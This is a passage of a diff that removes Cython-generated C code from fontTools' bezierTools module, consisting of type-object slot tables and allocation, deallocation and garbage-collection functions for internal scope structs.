__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; 
-#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - 
PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_i); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_i) { - e = (*v)(p->__pyx_v_i, a); if (e) return e; - } - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_4_genexpr", - sizeof(struct 
__pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_4_genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, 
/*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - 
o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_v_precision); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyObject *o, visitproc v, void *a) { - int e; - struct 
__pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o; - if (p->__pyx_v_precision) { - e = (*v)(p->__pyx_v_precision, a); if (e) return e; - } - return 0; -} - -static int __pyx_tp_clear_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyObject *o) { - PyObject* tmp; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t *)o; - tmp = ((PyObject*)p->__pyx_v_precision); - p->__pyx_v_precision = Py_None; Py_INCREF(Py_None); - Py_XDECREF(tmp); - return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {Py_tp_clear, (void *)__pyx_tp_clear_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_5__curve_curve_intersections_t", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - 
__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_5__curve_curve_intersections_t", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_traverse*/ - __pyx_tp_clear_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, 
/*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void 
__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)o; - #if CYTHON_USE_TP_FINALIZE - if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { - if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr) { - if (PyObject_CallFinalizerFromDealloc(o)) return; - } - } - #endif - PyObject_GC_UnTrack(o); - Py_CLEAR(p->__pyx_genexpr_arg_0); - Py_CLEAR(p->__pyx_v_x); - #if CYTHON_COMPILING_IN_CPYTHON - if (((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr)))) { - __pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr[__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr++] = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)o); - } else - #endif - { - #if CYTHON_USE_TYPE_SLOTS || CYTHON_COMPILING_IN_PYPY - (*Py_TYPE(o)->tp_free)(o); - #else - { - freefunc tp_free = (freefunc)PyType_GetSlot(Py_TYPE(o), Py_tp_free); - if (tp_free) tp_free(o); - } - #endif - } -} - -static int __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyObject *o, visitproc v, void *a) { - int e; - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *p = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)o; - if (p->__pyx_genexpr_arg_0) { - e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; - } - if (p->__pyx_v_x) { - e = (*v)(p->__pyx_v_x, a); if (e) return e; - } - 
return 0; -} -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_slots[] = { - {Py_tp_dealloc, (void *)__pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr}, - {Py_tp_traverse, (void *)__pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr}, - {Py_tp_new, (void *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr}, - {0, 0}, -}; -static PyType_Spec __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_spec = { - "fontTools.misc.bezierTools.__pyx_scope_struct_6_genexpr", - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr), - 0, - Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, - __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr_slots, -}; -#else - -static PyTypeObject __pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr = { - PyVarObject_HEAD_INIT(0, 0) - "fontTools.misc.bezierTools.""__pyx_scope_struct_6_genexpr", /*tp_name*/ - sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr), /*tp_basicsize*/ - 0, /*tp_itemsize*/ - __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, /*tp_dealloc*/ - #if PY_VERSION_HEX < 0x030800b4 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030800b4 - 0, /*tp_vectorcall_offset*/ - #endif - 0, /*tp_getattr*/ - 0, /*tp_setattr*/ - #if PY_MAJOR_VERSION < 3 - 0, /*tp_compare*/ - #endif - #if PY_MAJOR_VERSION >= 3 - 0, /*tp_as_async*/ - #endif - 0, /*tp_repr*/ - 0, /*tp_as_number*/ - 0, /*tp_as_sequence*/ - 0, /*tp_as_mapping*/ - 0, /*tp_hash*/ - 0, /*tp_call*/ - 0, /*tp_str*/ - 0, /*tp_getattro*/ - 0, /*tp_setattro*/ - 0, /*tp_as_buffer*/ - 
Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ - 0, /*tp_doc*/ - __pyx_tp_traverse_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, /*tp_traverse*/ - 0, /*tp_clear*/ - 0, /*tp_richcompare*/ - 0, /*tp_weaklistoffset*/ - 0, /*tp_iter*/ - 0, /*tp_iternext*/ - 0, /*tp_methods*/ - 0, /*tp_members*/ - 0, /*tp_getset*/ - 0, /*tp_base*/ - 0, /*tp_dict*/ - 0, /*tp_descr_get*/ - 0, /*tp_descr_set*/ - #if !CYTHON_USE_TYPE_SPECS - 0, /*tp_dictoffset*/ - #endif - 0, /*tp_init*/ - 0, /*tp_alloc*/ - __pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, /*tp_new*/ - 0, /*tp_free*/ - 0, /*tp_is_gc*/ - 0, /*tp_bases*/ - 0, /*tp_mro*/ - 0, /*tp_cache*/ - 0, /*tp_subclasses*/ - 0, /*tp_weaklist*/ - 0, /*tp_del*/ - 0, /*tp_version_tag*/ - #if PY_VERSION_HEX >= 0x030400a1 - #if CYTHON_USE_TP_FINALIZE - 0, /*tp_finalize*/ - #else - NULL, /*tp_finalize*/ - #endif - #endif - #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, /*tp_vectorcall*/ - #endif - #if __PYX_NEED_TP_PRINT_SLOT == 1 - 0, /*tp_print*/ - #endif - #if PY_VERSION_HEX >= 0x030C0000 - 0, /*tp_watched*/ - #endif - #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, /*tp_pypy_flags*/ - #endif -}; -#endif - -static PyMethodDef __pyx_methods[] = { - {0, 0, 0, 0} -}; -#ifndef CYTHON_SMALL_CODE -#if defined(__clang__) - #define CYTHON_SMALL_CODE -#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) - #define CYTHON_SMALL_CODE __attribute__((cold)) -#else - #define CYTHON_SMALL_CODE -#endif -#endif -/* #### Code section: pystring_table ### */ - -static int __Pyx_CreateStringTabAndInitStrings(void) { - __Pyx_StringTabEntry __pyx_string_tab[] = { - {&__pyx_n_s_1_t, __pyx_k_1_t, sizeof(__pyx_k_1_t), 0, 0, 1, 1}, - {&__pyx_n_s_1_t_2, __pyx_k_1_t_2, sizeof(__pyx_k_1_t_2), 0, 
